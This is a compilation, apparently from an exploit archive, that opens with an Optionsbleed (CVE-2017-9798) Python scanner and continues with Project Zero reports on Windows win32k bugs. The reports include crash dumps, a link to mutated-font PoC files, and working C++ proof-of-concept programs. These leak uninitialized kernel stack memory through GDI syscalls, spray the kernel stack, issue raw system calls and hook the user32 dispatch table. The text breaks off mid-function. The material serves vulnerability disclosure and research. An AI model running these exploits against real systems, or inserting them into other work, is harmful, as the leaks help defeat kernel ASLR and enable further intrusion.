#!/usr/bin/env python3
# Optionsbleed proof of concept test
# by Hanno Böck
import argparse
import urllib3
import re
def test_bleed(url, args):
    """Send one OPTIONS request to ``url`` and classify its Allow header.

    Prints one tagged line ([empty], [duplicates], [ok], [spaces] or [bleed])
    per distinct Allow value seen during the run; a value that is already in
    the module-level ``dup`` list is silently skipped.

    Args:
        url: Full URL (scheme included) to probe.
        args: Parsed command-line namespace; only ``args.all`` is read, to
            decide whether well-formed lists are reported as [ok].

    Returns:
        False if the response carried no Allow header at all (the caller
        uses this to stop retrying a prefix), None for an already-seen
        value, True otherwise.

    Relies on the module-level ``pool`` (urllib3 PoolManager) and ``dup``.
    """
    response = pool.request('OPTIONS', url)
    try:
        allow = str(response.headers["Allow"])
    except KeyError:
        return False

    # Each distinct header value is reported only once per run.
    if allow in dup:
        return
    dup.append(allow)

    # Well-formed value: comma-separated tokens such as GET or X-FOO.
    comma_list = "^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$"
    # Same tokens but space-separated: malformed, yet not corrupted data.
    space_list = "^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$"

    if not allow:
        print("[empty] %s" % (url))
    elif re.match(comma_list, allow):
        methods = [token.strip() for token in allow.split(',')]
        # A method listed more than once in an otherwise valid list.
        if len(methods) != len(set(methods)):
            print("[duplicates] %s: %s" % (url, repr(allow)))
        elif args.all:
            print("[ok] %s: %s" % (url, repr(allow)))
    elif re.match(space_list, allow):
        print("[spaces] %s: %s" % (url, repr(allow)))
    else:
        # Matches neither grammar: treated as corrupted header memory.
        print("[bleed] %s: %s" % (url, repr(allow)))
    return True
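parser = argparse.ArgumentParser(
    description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',
    epilog="Tests server for Optionsbleed bug and other bugs in the allow header.\n\n"
    "Autmatically checks http://, https://, http://www. and https://www. -\n"
    "except if you pass -u/--url (which means by default we check 40 times.)\n\n"
    "Explanation of results:\n"
    "[bleed] corrupted header found, vulnerable\n"
    "[empty] empty allow header, does not make sense\n"
    "[spaces] space-separated method list (should be comma-separated)\n"
    "[duplicates] duplicates in list (may be apache bug 61207)\n"
    "[ok] normal list found (only shown with -a/--all)\n",
    formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('hosttocheck', action='store',
                    help='The hostname you want to test against')
parser.add_argument('-n', nargs=1, type=int, default=[10],
                    help='number of tests (default 10)')
parser.add_argument("-a", "--all", action="store_true",
                    help="show headers from hosts without problems")
parser.add_argument("-u", "--url", action='store_true',
                    help="pass URL instead of hostname")
args = parser.parse_args()

# nargs=1 yields a one-element list and type=int has already converted it.
howoften = args.n[0]
# Allow header values already reported; shared with test_bleed() so each
# distinct value is printed once per run.
dup = []

# Note: This disables warnings about the lack of certificate verification.
# Usually this is a bad idea, but for this tool we want to find vulnerabilities
# even if they are shipped with invalid certificates.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Bounded connect/read timeouts so an unresponsive host cannot stall the scan
# indefinitely; a timeout is raised like any other connection error and is
# handled by the loop below.
pool = urllib3.PoolManager(10, cert_reqs='CERT_NONE',
                           timeout=urllib3.Timeout(connect=10.0, read=10.0))

if args.url:
    # A full URL was given: probe it once and let any error propagate.
    test_bleed(args.hosttocheck, args)
else:
    for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:
        for _ in range(howoften):
            try:
                # No Allow header at all means there is nothing to inspect,
                # so further attempts with this prefix are pointless.
                if test_bleed(prefix + args.hosttocheck, args) is False:
                    break
            except Exception:
                # Best effort: not every host serves every scheme/name
                # variant, so a failed attempt is skipped rather than
                # aborting the whole scan.
                pass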
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1274
We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff1effff, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91a65a52, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!fsc_CalcGrayRow+87
91a65a52 660fbe4fff movsx cx,byte ptr [edi-1]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 91a65990 to 91a65a52
STACK_TEXT:
981a885c 91a65990 ff1f83f8 ff1f8140 ff1f83a8 win32k!fsc_CalcGrayRow+0x87
981a88a0 919e26ac 00000008 ff1f8010 fbb36e78 win32k!fsc_CalcGrayMap+0x105
981a88e8 91b69e1a ff1f8010 ff1f807c 00000005 win32k!fs_ContourScan+0x582
981a89f4 91b69ef2 00000000 00000005 981a8b08 win32k!lGGOBitmap+0x15f
981a8a1c 919dd4f0 fbb36e78 00000005 981a8b08 win32k!ttfdGlyphBitmap+0x60
981a8a40 919dd386 fc23ccf0 00000009 00000005 win32k!ttfdQueryFontData+0x115
981a8a90 919dc5b2 00000000 fc23ccf0 00000009 win32k!ttfdSemQueryFontData+0x45
981a8ad8 91b351b4 00000000 fc23ccf0 00000009 win32k!PDEVOBJ::QueryFontData+0x3e
981a8b90 91b2cd60 fc23ccf0 fc23ccf0 00000006 win32k!GreGetGlyphOutlineInternal+0x534
981a8c0c 8288587a 04010215 00000022 00000006 win32k!NtGdiGetGlyphOutline+0x95
981a8c0c 76f370b4 04010215 00000022 00000006 nt!KiFastCallEntry+0x12a
WARNING: Frame IP not in any known module. Following frames may be wrong.
0020f504 00000000 00000000 00000000 00000000 0x76f370b4
---
The above crash dump comes from an old version of Windows 7 32-bit, because symbols for win32k.sys on the latest build are currently unavailable on the Microsoft Symbol Server. Nevertheless, a crash summary from an up-to-date system is as follows:
--- cut ---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff1e3fff, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91ce9382, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!EngDeleteClip+4883
91ce9382 660fbe4fff movsx cx,byte ptr [edi-1]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 91ce92c0 to 91ce9382
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
9aa98858 91ce92c0 ff1ee3f8 ff1ee140 ff1ee3a8 win32k!EngDeleteClip+0x4883
9aa9889c 91c64346 00000008 ff1ee010 fb9dce78 win32k!EngDeleteClip+0x47c1
9aa988e4 91dfa025 ff1ee010 ff1ee07c 00000005 win32k!XFORMOBJ_iGetXform+0x5864
9aa989f0 91dfa0fd 00000000 00000005 9aa98b04 win32k!XLATEOBJ_hGetColorTransform+0x40a1c
9aa98a18 91c5f086 fb9dce78 00000005 9aa98b04 win32k!XLATEOBJ_hGetColorTransform+0x40af4
9aa98a3c 91c5ef1c fc22ccf0 00000009 00000005 win32k!XFORMOBJ_iGetXform+0x5a4
9aa98a8c 91c5e138 00000000 fc22ccf0 00000009 win32k!XFORMOBJ_iGetXform+0x43a
9aa98ad4 91dc3424 00000000 fc22ccf0 00000009 win32k!EngCTGetGammaTable+0xc967
9aa98b90 91dbafcc fc22ccf0 fc22ccf0 00000006 win32k!XLATEOBJ_hGetColorTransform+0x9e1b
9aa98c0c 82888986 0c0104d1 00000022 00000006 win32k!XLATEOBJ_hGetColorTransform+0x19c3
9aa98c0c 77986c74 0c0104d1 00000022 00000006 nt!KiSystemServicePostCall
001cf4ac 00000000 00000000 00000000 00000000 0x77986c74
--- cut ---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf" table.
The issue reproduces on Windows 7 (other platforms untested). It is easiest to reproduce with Special Pools enabled for win32k.sys. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which calls the GetGlyphOutline() API with various parameters over all of the font's glyphs.
Attached is an archive with several proof-of-concept mutated TTF files.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42746.zip
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1275
We have discovered that the nt!NtGdiGetFontResourceInfoInternalW system call discloses portions of uninitialized kernel stack memory to user-mode clients.
This is caused by the fact that for user-specified output buffer sizes up to 0x5c, a temporary stack-based buffer is used by the syscall for optimization. As opposed to the pool allocation, the stack memory area is not pre-initialized with zeros, and when it is copied back to user-mode in its entirety, its contents disclose leftover kernel stack bytes containing potentially sensitive information.
The vulnerability is fixed in Windows 10, which has the following memset() call at the beginning of the function:
--- cut ---
.text:0025F9E6 push 5Ch ; size_t
.text:0025F9E8 push ebx ; int
.text:0025F9E9 lea eax, [ebp+var_118]
.text:0025F9EF push eax ; void *
.text:0025F9F0 call _memset
--- cut ---
This indicates that Microsoft is aware of the bug but didn't backport the fix to systems earlier than Windows 10. The issue was in fact discovered by cross-diffing the list of memset calls between Windows 7 and Windows 10, which illustrates how easy it is to use exclusive patches for one system version to attack another.
The attached proof-of-concept program demonstrates the disclosure. An example output is as follows:
--- cut ---
00000000: 00 00 00 00 a9 fb c2 82 02 00 00 00 19 00 00 00 ................
00000010: 00 00 00 00 46 69 6c 65 a8 6f 06 89 46 69 6c 65 ....File.o..File
00000020: c8 00 00 00 ff 07 00 00 00 00 00 00 00 30 06 89 .............0..
00000030: 00 08 00 00 46 02 00 00 68 72 b8 93 d0 71 b8 93 ....F...hr...q..
00000040: a8 71 b8 93 00 8b 2e 9a 98 a8 a2 82 68 8b 2e 9a .q..........h...
00000050: fa a8 a2 82 a8 71 b8 93 46 69 6c e5 ?? ?? ?? ?? .....q..Fil.....
--- cut ---
Only the first four bytes of the data are properly initialized to 0x00, while the rest are visibly leaked from the kernel stack and contain a multitude of kernel-space addresses, readily facilitating exploitation of other memory corruption vulnerabilities.
The bug is limited to leaking at most ~0x5c bytes at a time, as specifying a larger size will provoke a correctly padded pool allocation instead of the stack-based buffer.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
// Undocumented definitions for the gdi32!GetFontResourceInfoW function.
// Prototype used to call the export resolved via GetProcAddress() in main():
// (font file path, in/out buffer size, output buffer, information type).
// NOTE(review): parameter meanings are taken from how main() calls it, not
// from any header — confirm against the target build.
typedef BOOL(WINAPI *PGFRI)(LPCWSTR, LPDWORD, LPVOID, DWORD);
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
  // Classic hex dump: per row an 8-digit offset, 16 hex bytes, then an ASCII
  // column. Positions past the end of the buffer print as "??" / "." so the
  // final row keeps its width.
  const ULONG kRowWidth = 16;
  for (ULONG offset = 0; offset < dwBytes; offset += kRowWidth) {
    printf("%.8x: ", offset);
    ULONG column;
    for (column = 0; column < kRowWidth; column++) {
      ULONG index = offset + column;
      if (index < dwBytes)
        printf("%.2x ", Data[index]);
      else
        printf("?? ");
    }
    for (column = 0; column < kRowWidth; column++) {
      ULONG index = offset + column;
      BYTE value = (index < dwBytes) ? Data[index] : 0;
      // Only printable 7-bit ASCII is echoed; everything else is a dot.
      putchar((index < dwBytes && value >= 0x20 && value <= 0x7e) ? value : '.');
    }
    putchar('\n');
  }
}
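int main() {
  // Resolve the GDI32!GetFontResourceInfoW symbol. Both steps are checked:
  // the original code dereferenced a null function pointer if either failed.
  HINSTANCE hGdi32 = LoadLibrary(L"gdi32.dll");
  if (hGdi32 == NULL) {
    printf("LoadLibrary(gdi32.dll) failed, %lu\n", GetLastError());
    return 1;
  }
  PGFRI GetFontResourceInfo = (PGFRI)GetProcAddress(hGdi32, "GetFontResourceInfoW");
  if (GetFontResourceInfo == NULL) {
    printf("GetProcAddress(GetFontResourceInfoW) failed, %lu\n", GetLastError());
    return 1;
  }
  // Trigger the vulnerability and dump kernel stack output. The code assumes that Windows is
  // installed on partition C:\ and the C:\Windows\Fonts\arial.ttf font is present on disk.
  // 0x5c is the largest size for which the kernel uses its stack buffer (see the report above).
  // NOTE(review): the last argument (5) selects the information type; its meaning is not
  // documented in this file — confirm.
  BYTE OutputBuffer[0x5c] = { /* zero padding */ };
  DWORD OutputSize = sizeof(OutputBuffer);
  if (!GetFontResourceInfo(L"C:\\Windows\\Fonts\\arial.ttf", &OutputSize, OutputBuffer, 5)) {
    printf("GetFontResourceInfo failed.\n");
    return 1;
  }
  PrintHex(OutputBuffer, sizeof(OutputBuffer));
  return 0;
}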
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1276&desc=2
We have discovered that the nt!NtGdiEngCreatePalette system call discloses large portions of uninitialized kernel stack memory to user-mode clients.
This is caused by the fact that for palettes created in the PAL_INDEXED mode with up to 256 colors, a temporary stack-based buffer is used by the syscall for optimization (instead of locking the entire ring-3 memory area with win32k!bSecureBits). The stack memory region is not pre-initialized with zeros, but its contents may still be treated as valid palette colors by win32k!EngCreatePalette, in the special corner case when:
a) 1 <= cColors <= 256
b) pulColors == NULL
The above setting causes the win32k!bSafeReadBits to automatically succeed without actually reading any data from user-space, which further leads to the creation of a palette with colors set to uninitialized memory from the kernel stack (up to 1024 bytes!). These bytes can be subsequently read back using the GetPaletteEntries() API.
The vulnerability is fixed in Windows 8 and 10, which have the following memset() calls at the beginning of the function:
(Windows 8.1)
--- cut ---
.text:001B4B62 push 3FCh ; size_t
.text:001B4B67 lea eax, [ebp+var_400]
.text:001B4B6D mov [ebp+var_404], edi
.text:001B4B73 push edi ; int
.text:001B4B74 push eax ; void *
.text:001B4B75 call _memset
--- cut ---
(Windows 10)
--- cut ---
.text:002640C8 push 400h ; size_t
.text:002640CD mov [ebp+var_410], eax
.text:002640D3 lea eax, [ebp+var_404]
.text:002640D9 push edi ; int
.text:002640DA push eax ; void *
.text:002640DB mov [ebp+var_41C], ebx
.text:002640E1 call _memset
--- cut ---
This indicates that Microsoft is aware of the bug but didn't backport the fix to systems earlier than Windows 8. The issue was in fact discovered by cross-diffing the list of memset calls between Windows 7 and Windows 10, which illustrates how easy it is to use exclusive patches for one system version to attack another.
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows:
--- cut ---
00000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000050: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000060: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000070: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000100: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000110: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000120: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000130: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000140: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000150: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000160: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000170: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000180: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000190: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000200: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000210: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000230: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000260: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000270: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000280: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000290: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000300: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000310: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000320: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000330: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000340: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000350: 41 41 41 41 41 41 41 41 41 41 41 41 00 00 00 00 AAAAAAAAAAAA....
00000360: 21 00 00 00 00 00 00 00 88 0d cf 8e da 3f 87 82 !............?..
00000370: 09 50 14 00 04 00 00 00 00 dc 9d 98 25 82 5e 4d .P..........%.^M
00000380: 00 00 00 00 f0 dd 9d 98 d0 09 96 82 12 01 00 00 ................
00000390: 48 0d cf 8e 00 00 00 00 ae 01 00 00 6f 00 00 00 H...........o...
000003a0: 00 00 00 00 7e 53 0c 00 1c fc 1c 9a a5 f0 87 82 ....~S..........
000003b0: ef ff 07 00 12 01 00 00 40 58 14 00 cc f2 41 00 ........@X....A.
000003c0: 01 00 00 00 01 00 00 00 f0 dd 9d 98 00 00 00 00 ................
000003d0: 12 01 00 00 00 00 00 00 14 05 00 c0 25 82 5e 4d ............%.^M
000003e0: 00 00 00 00 00 00 00 00 00 10 00 00 6c fb 1c 9a ............l...
000003f0: 2c f9 1c 9a 67 08 00 00 67 08 00 00 48 0d cf 8e ,...g...g...H...
--- cut ---
The planted 0x41 bytes are clearly visible in the above hex dump. Since the stack spraying primitive used here (nt!NtMapUserPhysicalPages) still leaves some bytes intact at higher addresses, these bytes (containing a number of kernel-space addresses etc.) can be observed at offsets 0x360-0x400.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <winddi.h>
#include <cstdio>
// Native API prototype, declared here because the public SDK headers do not
// expose it; used by SprayKernelStack() below. NOTE(review): presumably
// resolved from ntdll at link time — confirm the import library used.
extern "C"
NTSTATUS WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
// Raw 32-bit system call stub (MSVC x86 inline asm only): eax carries the
// service number, edx is pointed at the variadic arguments that follow
// ApiNumber on the stack, and "int 0x2e" enters the kernel through the legacy
// interrupt gate. There is no return statement: the caller relies on whatever
// the kernel left in eax, which is compiler-specific behaviour.
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
  // Classic hex dump: per row an 8-digit offset, 16 hex bytes, then an ASCII
  // column. Positions past the end of the buffer print as "??" / "." so the
  // final row keeps its width.
  const ULONG kRowWidth = 16;
  for (ULONG offset = 0; offset < dwBytes; offset += kRowWidth) {
    printf("%.8x: ", offset);
    ULONG column;
    for (column = 0; column < kRowWidth; column++) {
      ULONG index = offset + column;
      if (index < dwBytes)
        printf("%.2x ", Data[index]);
      else
        printf("?? ");
    }
    for (column = 0; column < kRowWidth; column++) {
      ULONG index = offset + column;
      BYTE value = (index < dwBytes) ? Data[index] : 0;
      // Only printable 7-bit ASCII is echoed; everything else is a dot.
      putchar((index < dwBytes && value >= 0x20 && value <= 0x7e) ? value : '.');
    }
    putchar('\n');
  }
}
VOID MyMemset(PVOID ptr, BYTE byte, ULONG size) {
  // Byte-wise fill of `size` bytes starting at `ptr` with `byte`.
  // NOTE(review): a hand-rolled fill rather than memset(); the reason is not
  // stated in this file — confirm whether a CRT-free build is intended.
  PBYTE cursor = (PBYTE)ptr;
  PBYTE end = cursor + size;
  while (cursor != end) {
    *cursor++ = byte;
  }
}
// Leaves 'A' marker bytes on the kernel stack so that uninitialized data
// returned later by the affected syscall is recognizable in the hex dump.
// The same static buffer is passed both as the base address and as the
// page-frame array; the call's return status is deliberately ignored.
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static SIZE_T buffer[1024];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, ARRAYSIZE(buffer), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
  // Service number of NtGdiEngCreatePalette on Windows 7 32-bit; it differs per build.
  CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c;

  // Loading user32 turns this thread into a GUI thread so win32k services are reachable.
  LoadLibrary(L"user32.dll");

  // Leave recognizable marker bytes on the kernel stack before the syscall.
  SprayKernelStack();

  // PAL_INDEXED with 256 entries and no colour array: as described in the report
  // above, the palette entries end up holding leftover kernel stack contents.
  HPALETTE palette = (HPALETTE)SystemCall32(__NR_NtGdiEngCreatePalette, PAL_INDEXED, 256, NULL, 0.0f, 0.0f, 0.0f);
  if (!palette) {
    printf("[-] NtGdiEngCreatePalette failed.\n");
    return 1;
  }

  // Read all 256 entries back; anything short of that is treated as failure.
  PALETTEENTRY entries[256] = { /* zero padding */ };
  if (GetPaletteEntries(palette, 0, 256, entries) != 256) {
    printf("[-] GetPaletteEntries failed.\n");
    return 1;
  }

  PrintHex((PBYTE)entries, sizeof(entries));
  return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1304
We have discovered that the win32k!NtGdiDoBanding system call discloses portions of uninitialized kernel stack memory to user-mode clients.
More specifically, exactly 8 bytes of uninitialized kernel stack memory are copied to ring-3 in one of two execution contexts (unique stack traces):
--- 1 ---
#0 win32k.sys!memcpy+00000033
#1 win32k.sys!UMPDOBJ::ThunkMemBlock+00000047
#2 win32k.sys!UMPDDrvStartBanding+000000b1
#3 win32k.sys!GreDoBanding+000000ad
#4 win32k.sys!NtGdiDoBanding+0000001f
#5 ntoskrnl.exe!KiSystemServicePostCall+00000000
--- 1 ---
... and ...
--- 2 ---
#0 win32k.sys!memcpy+00000033
#1 win32k.sys!UMPDOBJ::ThunkMemBlock+00000047
#2 win32k.sys!UMPDDrvNextBand+000000b1
#3 win32k.sys!GreDoBanding+0000011e
#4 win32k.sys!NtGdiDoBanding+0000001f
#5 ntoskrnl.exe!KiSystemServicePostCall+00000000
--- 2 ---
The names and offsets are specific to Windows 7 32-bit from February 2017, as symbols for the latest win32k.sys are not available from the Microsoft Symbol Server at the moment. The leaked bytes originate from the stack frame of the win32k!NtGdiDoBanding function (top-level syscall handler), and a pointer to the uninitialized buffer is passed down to win32k!GreDoBanding in the third argument.
The attached proof-of-concept program can be used to reproduce the vulnerability on Windows 7 32-bit. On our test virtual machine, the output is as follows:
--- cut ---
[+] Leaked data: 00000bf8 00460000
[+] Leaked data: ff9ed130 969e68ad
[+] Leaked data: ff9ed130 969e68ad
[+] Leaked data: ff9ed130 969e68ad
...
--- cut ---
As it turns out, 0xff9ed130 is a valid paged session pool address, and 0x969e68ad is a valid code address within win32k.sys:
--- cut ---
3: kd> !pool ff9ed130
Pool page ff9ed130 region is Paged session pool
ff9ed000 size: 118 previous size: 0 (Allocated) Usqu
*ff9ed118 size: ee8 previous size: 118 (Allocated) *GDev
Pooltag GDev : Gdi pdev
3: kd> u 969e68ad
win32k!EngReleaseSemaphore+0x2f6:
969e68ad c3 ret
969e68ae 90 nop
969e68af 90 nop
969e68b0 90 nop
969e68b1 90 nop
969e68b2 90 nop
969e68b3 8bff mov edi,edi
969e68b5 55 push ebp
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
namespace globals {
// Original user32!ClientPrinterThunk entry, saved by HookUser32DispatchFunction()
// so that ClientPrinterThunkHook() can forward every callback after inspecting it.
LPVOID(WINAPI *OrigClientPrinterThunk)(LPVOID);
} // namespace globals
PVOID *GetUser32DispatchTable() {
// Returns the pointer stored at offset 0x2c of the structure fs:[30h] points to.
// On 32-bit Windows fs:[30h] is the PEB; the field at 0x2c is presumably
// PEB.KernelCallbackTable, the user32 callback dispatch table this function is
// named after — confirm the offset for the target build. MSVC x86 inline asm:
// the result is left in eax (the return register); there is no return statement.
__asm {
mov eax, fs:30h
mov eax, [eax + 0x2c]
}
}
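BOOL HookUser32DispatchFunction(UINT Index, PVOID lpNewHandler, PVOID *lpOrigHandler) {
  // Replace entry `Index` of the user32 dispatch table with lpNewHandler and hand
  // the previous entry back through lpOrigHandler. The table page is made
  // writable only for the duration of the swap and its protection is restored
  // afterwards. Returns TRUE on success. On failure a message is printed and
  // FALSE returned; if the first VirtualProtect fails the table is untouched,
  // if the second fails the swap has happened but the protection was not restored.
  PVOID *DispatchTable = GetUser32DispatchTable();
  if (DispatchTable == NULL) {
    printf("Dispatch table lookup failed\n");
    return FALSE;
  }
  // NOTE(review): 0x1000 assumes the table lies within one 4 KiB page — confirm.
  DWORD OldProtect;
  if (!VirtualProtect(DispatchTable, 0x1000, PAGE_READWRITE, &OldProtect)) {
    // GetLastError() returns a DWORD, hence %lu rather than %d.
    printf("VirtualProtect#1 failed, %lu\n", GetLastError());
    return FALSE;
  }
  *lpOrigHandler = DispatchTable[Index];
  DispatchTable[Index] = lpNewHandler;
  if (!VirtualProtect(DispatchTable, 0x1000, OldProtect, &OldProtect)) {
    printf("VirtualProtect#2 failed, %lu\n", GetLastError());
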